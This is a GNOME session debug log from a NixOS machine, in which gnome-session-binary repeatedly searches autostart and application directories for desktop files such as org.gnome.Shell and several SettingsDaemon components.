machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.XSettings.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.Sound.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.XSettings.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): fill: *** Done checking required components
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): fill: *** Adding required components
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.Shell.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/share/applications/org.gnome.Shell.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Sound.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.UsbProtection.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
